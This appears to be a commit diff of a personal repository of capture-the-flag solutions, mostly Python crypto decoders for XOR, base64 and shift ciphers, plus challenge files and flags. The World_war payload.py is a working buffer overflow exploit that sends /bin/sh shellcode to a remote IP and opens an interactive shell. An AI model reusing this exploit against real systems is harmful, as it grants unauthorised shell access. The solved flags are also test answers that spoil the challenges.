first commit

AsgamaCTF/Crypto/1byte_ROXy/decode.py

@@ -0,0 +1,12 @@
+from pwn import *
+
+cipher = "e7c1cdc1e3f4e6dbcfcec5ffc2d9d4c5ffd8cfd2d29f9fdd"
+
+cipher = cipher.decode('hex')
+
+for i in range(256):
+	plain = xor(cipher, i)
+	if "GamaCTF{" in plain:
+		print plain
+		break
+

AsgamaCTF/Crypto/Capek/base

@@ -0,0 +1 @@
+Vm0wd2QyUXlVWGxWV0d4V1YwZDRWMVl3WkRSV01WbDNXa1JTVjAxV2JETlhhMUpUVjBaS2RHVkdXbFppVkZaeVZtMTRTMk15VGtsalJtaG9UV3N3ZUZadGNFZFRNazE1VTJ0V1ZXSkhhRzlVVmxaM1ZsWmFkR05GU214U2JHdzFWVEowVjFaWFNraGhSemxWVmpOT00xcFZXbUZrUjA1R1pFWlNUbFpYZHpGV1ZFb3dWakZhV0ZOcmFHaFNlbXhXVm1wT1QwMHhjRlpYYlVaclVqQTFSMWRyV25kV01ERkZVbFJHVjFaRmIzZFdha1poVjBaT2NtRkhhRk5sYlhoWFZtMHhORmxWTUhoWGJrNVlZbFZhY2xWcVFURlNNVlY1VFZSU1ZrMXJjRmhWTW5SM1ZqSktWVkpZWkZwV1JWcHlWVEJhVDJOc2NFaGpSazVYVWpOb2IxWXhaRFJWTVVsNVZXNU9XR0pIVWxsWmJHaFRWMFpTVjJGRlRsTmlSbkJaV2xWYVQxWlhTbFpYVkVwV1lrWktSRlpxUVhoa1ZsWjFWMnhhYUdFeGNGbFhhMVpoVkRKTmVGcElUbWhTTW5oVVZGY3hiMWRzV1hoWGJYUk9VakZHTlZaWE5VOWhiRXAwVld4c1dtSkdXbWhaTW5oWFkxWkdWVkpzVGs1WFJVcElWbXBLTkZReFdsaFRhMlJxVW14d1dGbHNhRk5OTVZweFUydDBWMVpyY0ZwWGExcDNZa2RGZWxGcmJGZGlXRUpJVmtSS1UxWXhXblZVYkdocFZqSm9lbGRYZUc5aU1rbDRWMjVTVGxkSFVsWlVWbHBYVGxaV2RHUkhkRmROVjFKSldWVmFjMWR0U2tkWGJXaGFUVzVvV0ZreFdrZFdWa3B6VkdzMVYwMVZiekZXYlhCTFRrWlJlRmRzYUZSaVJuQnhWV3hrVTFsV1VsWlhiVVpPVFZad2VGVXlkREJXTVZweVkwWndXR0V4Y0hKWlZXUkdaVWRPUjJKR2FHaE5WbkJ2Vm10U1MxUXlUWGxVYTFwaFVqSm9WRlJYTlc5a2JGcEhWbTA1VWsxWFVsaFdNV2h2V1ZaS1IxTnNaRlZXYkhCNlZHdGFWbVZYVWtoa1JtaFRUVWhDU2xac1pEUmpNV1IwVTJ0b2FGSnNTbGhVVlZwM1ZrWmFjVk5yWkZOaVJrcDZWa2N4YzFVeVNuSlRiVVpYVFc1b1dGbHFTa1psUm1SWldrVTFWMVpzY0ZWWFYzUnJWVEZzVjFWc1dsaGlWVnB6V1d0YWQyVkdWWGxrUkVKWFRWWndlVll5ZUhkWGJGcFhZMGhLVjFaRldreFdNVnBIWTIxS1IxcEdaRTVOUlhCS1ZtMTBVMU14VlhoWFdHaGhVMFphVmxscldrdGpSbHB4VkcwNVYxWnNjRWhYVkU1dllWVXhXRlZ1Y0ZkTlYyaDJWMVphUzFJeFRuVlJiRlpYVFRGS05sWkdVa2RWTVZwMFVtdG9VRlp0YUZSVVZXaERVMnhhYzFwRVVtcE5WMUl3VlRKMGIyRkdTbk5UYkdoVlZsWndNMVpyV21GalZrcDFXa1pPVGxacmNEVldSM2hoVkRKR1YxTnVVbEJXUlRWWVZGYzFiMWRHWkZkWGJFcHNWbXR3ZVZkcldtOWhWMFkyVm01b1YxWkZTbkpVYTFwclVqRldjMXBHYUdoTk1VcFZWbGN4TkdReVZrZFdXR3hyVWpOU2IxbHNWbmRXTVZwMFkwZEdXR0pHY0ZoWk1HUnZWMnhhV0ZWclpHRldWMUpRVlRCVk5WWXlSa2hoUlRWWFltdEtNbFp0TVRCVk1VMTRWVmhzVlZkSGVGWlpWRVozWVVaV2NWTnRPVmRTYkVwWlZGWmpOV0pIU2toVmJHeGhWbGROTVZsV1ZYaFhSbFoxWTBaa1RsWXlhREpXYWtKclV6RmtWMVp1U2xCV2JIQndWakJhUzA1c1drZFZhMlJXVFdzeE5GWXlOVk5oTVVwMFZXNUNWMkpIYUVSVWJGcHJWbFpHZEZKdGNFNVdNVWwzVmxSS01HRXhaRWhUYkdob1VqQmFWbFp0ZUhkTk1XeFdWMjVrVTJKSVFrZFVNVlUxWVZaS1dWRllaRmhpUmxwb1ZrUktSMVl4VW5KWGJGSnBWbFp3V1ZaR1l6RmlNV1JIWWtoR1ZHRXhjSE5WYlRGVFYyeGtjbFpVUmxkTmEzQllWVEkxYjFZeFdYcGhTRXBhWVd0YWNsVnFSbGRqTWtaR1QxWmtWMVpHV2pKV2JHTjRUa2RSZVZaclpGZFhSM2h5VldwT1UySXhiSE5XYm1SWFRWZDRNVmt3VmpCV01rcEhZa1JhV2xaWGFFeFdNbmhoVjBaV2NscEhSbGRXTVVwUlZsUkNhMUl4U1hsU2EyaHBVbXMxY0ZVd1ZrdE5iRnB4VW0xR1ZrMVZNVFJXVm1oelZsWmtTR0ZIYUZaTlJuQm9WbTE0YzJOc1pISmtSM0JUWWtad05GWlhNVEJOUmxsNFYyNU9hbEpYYUZoV2FrNVRWRVpzVlZGWWFGTldhM0I2VmtkNFlWVXlTa1pYV0hCWFZsWndSMVF4V2tOVmJFSlZUVVF3UFE9PQ==

AsgamaCTF/Crypto/Capek/decryptloop.py

@@ -0,0 +1,10 @@
+from base64 import *
+with open("base", "r") as file:
+    text = file.read()
+    decoded = ""
+    while True:
+        decoded = b64decode(text)
+        text = decoded
+        if(text.find("CTF{") != -1):
+           break
+    print text

AsgamaCTF/Reverse/pwd/.gdb_history

@@ -0,0 +1,194 @@
+b *main
+r
+ni
+r
+ni
+si
+ni
+si
+ni
+pdisas c
+b *0x0000000000400761
+r
+ni
+si
+ni
+r
+ni
+si
+ni
+ni
+r
+r
+r < $(python -c "print '\xde\x00\x00\x00'")
+r <<< $(python -c "print '\xde\x00\x00\x00'")
+ni
+r <<< $(python -c "print '\xde\x00\x00\x00'")
+ni
+r <<< $(python -c "print '\xbe\x00\x00\x00'")
+ni
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde'")
+ni
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde'")
+ni
+si
+ni
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x1d\x00\x00\x00\x00'")
+ni
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde'")
+ni
+si
+ni
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde\x00\x02'")
+ni
+si
+ni
+r <<< $(python -c "print '\x20\x00\xef\xee\xbe\xad\xde'")
+ni
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde'")
+ni
+r <<< $(python -c "print '\x02\x00\xef\xee\xbe\xad\xde'")
+ni
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde'")
+ni
+si
+ni
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x1d\x00\x00\x00\x00'")
+ni
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x1d\x00\x00\x00\'")
+ni
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00\x00\x00\x1d'")
+ni
+si
+ni
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\xef\xee\xbe\x1d'")
+ni
+r <<< $(python -c "print '\xef\xee\xbe\xad\x1d'")
+ni
+pdisas c
+b *0x0000000000400746
+r <<< $(python -c "print '\xef\xee\xbe\xad\x22'")
+ni
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde'")
+ni
+si
+ni
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde\x11\x11\x11\x11\x1d'")
+ni
+r <<< $(python -c "print '\x11\x11\x11\x11\x1d\xef\xee\xbe\xad\xde'")
+ni
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + 'a' * 4 + '\x1d'")
+ni
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde'")
+ni
+si
+ni
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + a * 8")
+ni
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + a")
+ni
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde'")
+ni
+r <<< $(python -c "print 'a' + '\xef\xee\xbe\xad\xde'")
+ni
+r <<< $(python -c "print 'a' * 8 + '\xef\xee\xbe\xad\xde'")
+ni
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde'")
+ni
+si
+ni
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x1d\x1d\x1d\x1d'")
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\xde\x1d\x1d\x1d'")
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x1d\x1d\x1d'")
+ni
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00\x00\x00x1d'")
+ni
+si
+ni
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00\x00\x00\x1d'")
+ni
+si
+ni
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00' * 7 + '\x1d'")
+ni
+si
+ni
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00' * 6 + '\x1d'")
+ni
+si
+ni
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + 'a' * 7 + '\x1d'")
+ni
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + 'a' * 7 + '\x1d'")
+ni
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00' * 7 + '\x1d'")
+ni
+si
+ni
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x1d' + 'a' * 7")
+ni
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x1d' + '\x00' * 7")
+ni
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00' + '\x1d' + '\x00' * 6")
+ni
+si
+ni
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00' + '\x1d' + '\xd0' * 6")
+ni
+si
+ni
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x1d' + '\x00' * 7")
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00' * 3 + '\x00' * 4 + '\x1d'")
+ni
+si
+ni
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00' * 7 + '\x1d'")
+ni
+si
+ni
+ni
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00' * 7 + 'a'")
+ni
+si
+ni
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00' * 7 + 'a'")
+ni
+si
+ni
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00' * 7 + 'a'")
+ni
+si
+ni
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00' * 7 + 'a'* 7")
+ni
+si
+ni
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00' + 'a'* 20")
+ni
+si
+ni
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00' + 'a'* 40")
+ni
+si
+ni
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00'*7 + '\x1e'")
+ni
+si
+ni
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00' + '\x1e' * 7")
+ni
+si
+ni
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00' + '\x1e' * 14")
+ni
+si
+ni
+r <<< $(python -c "print '\x00' + '\xef\xee\xbe\xad\xde' + '\x00' + '\x1e' * 14")
+ni
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00' + '\x1e' * 13")
+ni
+si
+ni
+r <<< $(python -c "print '\xde' + '\x00' + '\x1e' * 13")
+ni
+r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00' + '\x1e' * 13")

AsgamaCTF/Reverse/pwd/decode.py

@@ -0,0 +1 @@
+

GKSK/Crypto/GKSK_Crypto_Service/decrypt.py

@@ -0,0 +1,26 @@
+import base64
+
+secret_out = ''
+secret_str = ''.join("gksk-secret-code".split("-"))
+for count, loop in enumerate(secret_str):
+	if count % 2 == 0:
+		secret_out += ''.join([chr(ord(ch) + 0x3) for ch in loop])
+	else:
+		secret_out += loop
+
+print secret_out
+
+enc = open("flag.enc", "r").read()
+shift_key = 0
+while True:
+	shift_key += 1
+	cipher = base64.b64decode(enc)
+	alphabet = secret_out * 50
+	shifted_alphabet = alphabet[shift_key:] + alphabet[:shift_key]
+	flag = ''
+	for i in range(len(cipher[:-1])):
+		flag += chr((ord(cipher[i]) ^ shift_key) - ord(shifted_alphabet[i]))
+
+	if "GKSK{" in flag:
+		print flag
+		break

GKSK/Crypto/GKSK_Crypto_Service/flag.enc

@@ -0,0 +1 @@
+kraiqvy1qe+2oqi2kbSftqS3/KmknKHv7+/rwbj/pK+h8+XS8p+topm17b72sK2b8q6go/ygmaijtfaxoZipm67vv6un8Zu2r7ag4fLHqZGz9Jzxkbet/qG2t5Gpk/ywmLWg/8/LwcyftKmuqbycqZC1rKqzsLWdtqys79ujqqGprLDjoaacor2qqqqgvJHuo7Co0OebveWToojt9s6otrWQqe+psq6h7baa/qG2t5Gpk//+BQ==

GKSK/Crypto/GKSK_Crypto_Service/gksk_crypto_service.py

@@ -0,0 +1,97 @@
+#!/usr/bin/python2.7
+# -*- coding: utf-8 -*-
+
+import sys
+import random
+import base64
+
+def banner():
+    return '''
+
+ Welcome to our brand new crypto service
+   ________ _______ __ __    ____________  ______  __________     _____ __________ _    __________________
+  / ____/ //_/ ___// //_/   / ____/ __ \ \/ / __ \/_  __/ __ \   / ___// ____/ __ \ |  / /  _/ ____/ ____/
+ / / __/ ,<  \__ \/ ,<     / /   / /_/ /\  / /_/ / / / / / / /   \__ \/ __/ / /_/ / | / // // /   / __/
+/ /_/ / /| |___/ / /| |   / /___/ _, _/ / / ____/ / / / /_/ /   ___/ / /___/ _, _/| |/ // // /___/ /___
+\____/_/ |_/____/_/ |_|   \____/_/ |_| /_/_/     /_/  \____/   /____/_____/_/ |_| |___/___/\____/_____/
+ version [v2.1.19]
+    '''
+
+def print_usage(script_argv):
+    print '[==USAGE==]\n'
+    print 'Encrypt File \t: %s -e [plaintext_file] [key]' % script_argv
+    print 'Decrypt File \t: %s -d [encrypted_file] [key]' % script_argv
+    print 'Generate Key \t: %s -g' % script_argv
+    print 'Help \t\t: %s -h\n' % script_argv
+
+def shift_key():
+    key = random.randint(0x1, 0xff)
+    return key
+
+def shuffle_secret():
+    secret_out = ''
+    secret_str = ''.join('gksk-secret-code'.split('-'))
+    for count,loop in enumerate(secret_str):
+        if count % 2 == 0:
+            secret_out += ''.join([chr(ord(ch) + 0x3) for ch in loop])
+        else:
+            secret_out += loop
+    return secret_out
+
+def encryption(plain, shift):
+    try:
+        ciphertext = ''
+        length_msg = 50
+        with open(plain, 'rb') as bin:
+            data = bin.read()
+
+        shift = int(shift)
+        alphabet = shuffle_secret() * length_msg
+        shifted_alphabet = alphabet[shift:] + alphabet[:shift]
+        for a, b in zip(data, shifted_alphabet):
+            ciphertext += chr(ord(a) + ord(b) ^ shift)
+
+        with open(plain + '.enc', 'wb') as bin:
+            bin.write(base64.b64encode(ciphertext))
+
+    except ValueError:
+        print "ValueError : Range key [0-255]"
+        exit()
+
+def decryption(enc_file, key):
+    with open(enc_file, 'rb') as bin:
+        data = bin.read()
+
+    '''NOT IMPLEMENTED YET'''
+
+    with open(enc_file + '.trial', 'wb') as bin:
+        bin.write(data)
+
+
+def main():
+    print banner()
+    script_argv = sys.argv[0]
+    try:
+        mode = sys.argv[1]
+        if mode == '-e':
+            plaintext_file = sys.argv[2]
+            key = sys.argv[3]
+            encryption(plaintext_file, key)
+            print "\nSECRET KEY : ", shuffle_secret()
+            print '\nThankyou for using our service :)\n'
+        elif mode == '-d':
+            encrypted_file = sys.argv[2]
+            key = sys.argv[3]
+            decryption(encrypted_file, key)
+            print '\nNot implemented yet. Upgrade to premium, only $99999\n'
+        elif mode == '-g':
+            print 'Key : ', shift_key()
+        elif mode == '-h':
+            print_usage(script_argv)
+        else:
+            print_usage(script_argv)
+    except IndexError:
+        print_usage(script_argv)
+
+if __name__ == '__main__':
+    main()

GKSK/Joy/Hack_The_Game_v0.0.1/flag.txt

@@ -0,0 +1 @@
+GKSK{4re_Y0u_53ri0usly_checking_f0r_b3t4_t3sT?}

GKSK/Joy/Hack_The_Game_v0.0.2/cheat.py

@@ -0,0 +1,4 @@
+import base64
+
+cheat = "PlayerLevel=1;PlayerExp=1;PlayerHP=100;PlayerAtk=987654321;PlayerDef=987654321;PlayerName=ar" 
+print base64.b64encode(cheat)

GKSK/Joy/Hack_The_Game_v0.0.2/test.py

@@ -0,0 +1,12 @@
+cheat = "UGxheWVyTGV2ZWw9OTk5OTk5OTk5O1BsYXllckV4cD05OTk5OTk5OTk5O1BsYXllckhQPTk4NzY1NDMyMTtQbGF5ZXJBdGs9OTg3NjU0MzIxO1BsYXllckRlZj05ODc2NTQzMjE7UGxheWVyTmFtZT1Cb2Rv"
+alphabet = "abcdefghijklmnopqrstuvwxyz"
+newcheat = ""
+for i in cheat:
+	if i in alphabet.upper():
+		newcheat += i.lower()
+	elif i in alphabet.lower():
+		newcheat += i.upper()
+	else:
+		newcheat += i
+
+print newcheat

GKSK/Pwn/World_war/.gdb_history

@@ -0,0 +1,3 @@
+pattern create 500
+r
+pattern offset 0x65414149

GKSK/Pwn/World_war/payload.py

@@ -0,0 +1,15 @@
+shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"
+from pwn import *
+
+r = remote("180.250.7.183", 51137)
+r.recvuntil("coordinate : ")
+
+buff = r.recvline()
+buff = buff[:10]
+buff = int(buff, 16)
+buff = p32(buff)
+
+payload = shellcode + "a" * (72-len(shellcode)) + buff
+
+r.sendline(payload)
+r.interactive()

GKSK/Pwn/World_war/peda-session-world_war.txt

@@ -0,0 +1 @@
+

IDCC/Crypto/DecryptME/decrypt.py

@@ -0,0 +1,35 @@
+# Python2 ver.
+# If you use Python3 interpreter, the trouble will be in print format
+
+# [KSL Playground][Crypto][IDCC2018 DecryptME] written by Mr. Goodnight
+# Link: https://euectf.stikom-bali.ac.id/challenges#[IDCC]%20DecryptME
+# Flag: IDCC{S1mpl3_4nd_stR4ight}
+
+from base64 import *
+
+# Encryption algorithm
+# ciphertext = plaintext + keys
+with open('./enkripsi', mode = 'r') as f:
+	ciphertext = f.read()
+
+# plaintext = ciphertext - keys
+# Make my own function to decrypt the ciphertext
+def decrypt(ciphertext, keys):
+	plaintext = ""
+	for num,char in enumerate (ciphertext):
+		plaintext += chr((ord(char) - ord(keys[num % len(keys)])) % 127)
+			
+	return plaintext
+
+# keys = ciphertext - plaitext
+# Find the key by using known string attack 
+# Then I found out that the key is raja
+known_string = b64encode("IDCC{")
+keys = ""
+for num,char in enumerate (known_string):
+	keys += chr((ord(ciphertext[num]) - ord(char)) % 127)
+
+# Run the decrypt function the decode it
+keys = "raja"
+flag = b64decode(decrypt(ciphertext, keys))
+print ("Flag: {f}".format(f = flag))

IDCC/Crypto/DecryptME/enkripsi

@@ -0,0 +1 @@
+F7=&D_6@9YU&9HA) MK9HL=RMSY3(

IDCC/Crypto/DecryptME/test.py

@@ -0,0 +1,35 @@
+from base64 import *
+def enkripsi(plain, keys):
+	enc = []
+	plain = b64encode(plain)
+	for i, l in enumerate(plain):
+		kunci = ord(keys[i % len(keys)])
+		teks = ord(l)
+		enc.append(chr((teks + kunci) % 127))
+                #enc = teks + kunci
+	return ''.join(enc)
+
+def findKey():
+    key = []
+    known = b64encode("IDCC{")
+    file = open("enkripsi", "rb")
+    file = file.read()
+    for i, l in enumerate(known):
+        kunci = ord(file[i])
+        teks = ord(l)
+        key.append((chr((kunci - teks) % 127)))
+    return ''.join(key)
+
+def decryption():
+    key = "raja"
+    flag = []
+    file = open("enkripsi", "r").read()
+    for i, l in enumerate(file):
+        kunci = ord(key[i % len(key)])
+	cipher = ord(l)
+	flag.append(chr((cipher - kunci) % 127))
+    return ''.join(flag)
+
+    
+print findKey()
+print b64decode(decryption())

SlashRoot/Crypto/RSA_Token_Generator/payload.py

@@ -0,0 +1,29 @@
+from pwn import *
+
+r = remote("103.200.7.156", 1003)
+
+r.recvuntil(">>> ")
+r.sendline("2")
+
+for i in range(5):
+	r.recvuntil("e = ")
+	e = r.recvline()
+	e = int(e[:-1])
+
+	r.recvuntil("n = ")
+	n = r.recvline()
+	n = int(n[:-1])
+
+	r.recvuntil("c = ")
+	c = r.recvline()
+	c = int(c[:-1])
+
+	p = 1000
+	while True:
+		if(pow(p, e, n) == c):
+			break
+		p +=1
+	r.sendline(str(p))
+	print "p = ", p
+
+r.interactive()

TAMUCTF/Crypto/Smile/decoder.py

@@ -0,0 +1,13 @@
+from base64 import *
+
+enc = "XUBdTFdScw5XCVRGTglJXEpMSFpOQE5AVVxJBRpLT10aYBpIVwlbCVZATl1WTBpaTkBOQFVcSQdH"
+flag = b64decode(enc)
+key = ":)"
+newflag = []
+for i, l in enumerate(flag):
+	kunci = ord(key[i % len(key)])
+	cipher = ord(l)
+	newflag.append(chr(kunci ^ cipher))
+
+newflag = ''.join(newflag)
+print newflag

TAMUCTF/Misc/Hello_World/decoder.py

@@ -0,0 +1,99 @@
+flag = '''push103
+push 105
+push 103
+push 101
+push 109
+push 123
+push 48
+push 104
+push 95
+push 109
+push 121
+push 95
+push 119
+push 104
+push 52
+push 116
+push 95
+push 115
+push 112
+push 52
+push 99
+push 49
+push 110
+push 103
+push 95
+push 121
+push 48
+push 117
+push 95
+push 104
+push 52
+push 118
+push 51
+push 125
+push 33
+push 101
+push 99
+push 97
+push 112
+push 115
+push 101
+push 116
+push 105
+push 104
+push 119
+push 32
+push 102
+push 111
+push 32
+push 116
+push 111
+push 108
+push 32
+push 97
+push 32
+push 115
+push 105
+push 32
+push 101
+push 114
+push 117
+push 115
+push 32
+push 116
+push 97
+push 104
+push 116
+push 32
+push 44
+push 101
+push 101
+push 103
+push 32
+push 121
+push 108
+push 108
+push 111
+push 103
+push 32
+push 116
+push 101
+push 101
+push 119
+push 115
+push 32
+push 108
+push 108
+push 101
+push 87
+'''
+newflag = ""
+flag = flag.replace('push', '')
+flag = flag.replace('\n', '')
+flag = flag.split(" ")
+flag = map(int, flag)
+
+for i in flag:
+	newflag += chr(i)
+print newflag

TAMUCTF/Misc/I_heard_you_like_files/output/audit.txt

@@ -0,0 +1,27 @@
+Foremost version 1.5.7 by Jesse Kornblum, Kris Kendall, and Nick Mikus
+Audit File
+
+Foremost started at Sun Mar  3 15:59:09 2019
+Invocation: foremost art.png 
+Output directory: /home/chao/Documents/CTF/TAMUCTF/Misc/I_heard_you_like_files/output
+Configuration file: /etc/foremost.conf
+------------------------------------------------------------------
+File: art.png
+Start: Sun Mar  3 15:59:09 2019
+Length: 3 MB (3518869 bytes)
+ 
+Num	 Name (bs=512)	       Size	 File Offset	 Comment 
+
+0:	00006700.zip 	      86 KB 	    3430685 	 
+1:	00000000.png 	       3 MB 	          0 	  (1920 x 1080)
+2:	00006657.pdf 	      21 KB 	    3408641 	 
+Finish: Sun Mar  3 15:59:09 2019
+
+3 FILES EXTRACTED
+	
+zip:= 1
+png:= 1
+pdf:= 1
+------------------------------------------------------------------
+
+Foremost finished at Sun Mar  3 15:59:09 2019

TAMUCTF/Misc/I_heard_you_like_files/output/zip/[Content_Types].xml

@@ -0,0 +1,3 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"><Default Extension="xml" ContentType="application/xml"/><Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/><Default Extension="png" ContentType="image/png"/><Default Extension="jpeg" ContentType="image/jpeg"/><Override PartName="/_rels/.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/><Override PartName="/docProps/app.xml" ContentType="application/vnd.openxmlformats-officedocument.extended-properties+xml"/><Override PartName="/docProps/core.xml" ContentType="application/vnd.openxmlformats-package.core-properties+xml"/><Override PartName="/word/_rels/document.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/><Override PartName="/word/settings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.settings+xml"/><Override PartName="/word/fontTable.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.fontTable+xml"/><Override PartName="/word/media/image1.png" ContentType="image/png"/><Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/><Override PartName="/word/styles.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.styles+xml"/>
+</Types>

TAMUCTF/Misc/I_heard_you_like_files/output/zip/_rels/.rels

@@ -0,0 +1,3 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties" Target="docProps/core.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties" Target="docProps/app.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/>
+</Relationships>

TAMUCTF/Misc/I_heard_you_like_files/output/zip/docProps/app.xml

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"><Template></Template><TotalTime>12</TotalTime><Application>LibreOffice/6.1.1.2$Linux_X86_64 LibreOffice_project/10$Build-2</Application><Pages>1</Pages><Words>4</Words><Characters>24</Characters><CharactersWithSpaces>27</CharactersWithSpaces><Paragraphs>1</Paragraphs></Properties>

TAMUCTF/Misc/I_heard_you_like_files/output/zip/docProps/core.xml

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:dcmitype="http://purl.org/dc/dcmitype/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><dcterms:created xsi:type="dcterms:W3CDTF">2018-09-20T15:47:36Z</dcterms:created><dc:creator></dc:creator><dc:description></dc:description><dc:language>en-US</dc:language><cp:lastModifiedBy></cp:lastModifiedBy><dcterms:modified xsi:type="dcterms:W3CDTF">2018-09-20T16:00:01Z</dcterms:modified><cp:revision>1</cp:revision><dc:subject></dc:subject><dc:title></dc:title></cp:coreProperties>

TAMUCTF/Misc/I_heard_you_like_files/output/zip/not_the_flag.txt

@@ -0,0 +1 @@
+Sorry, no flag here

TAMUCTF/Misc/I_heard_you_like_files/output/zip/word/_rels/document.xml.rels

@@ -0,0 +1,3 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/>
+</Relationships>

TAMUCTF/Misc/I_heard_you_like_files/output/zip/word/document.xml

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<w:document xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" mc:Ignorable="w14 wp14"><w:body><w:p><w:pPr><w:pStyle w:val="TextBody"/><w:widowControl/><w:pBdr></w:pBdr><w:spacing w:before="0" w:after="225"/><w:ind w:left="0" w:right="0" w:hanging="0"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Open Sans;Arial;sans-serif" w:hAnsi="Open Sans;Arial;sans-serif"/><w:b w:val="false"/><w:i w:val="false"/><w:caps w:val="false"/><w:smallCaps w:val="false"/><w:color w:val="000000"/><w:spacing w:val="0"/><w:sz w:val="21"/></w:rPr></w:pPr><w:r><w:rPr><w:rFonts w:ascii="Open Sans;Arial;sans-serif" w:hAnsi="Open Sans;Arial;sans-serif"/><w:b w:val="false"/><w:i w:val="false"/><w:caps w:val="false"/><w:smallCaps w:val="false"/><w:color w:val="000000"/><w:spacing w:val="0"/><w:sz w:val="21"/></w:rPr><w:drawing><wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" 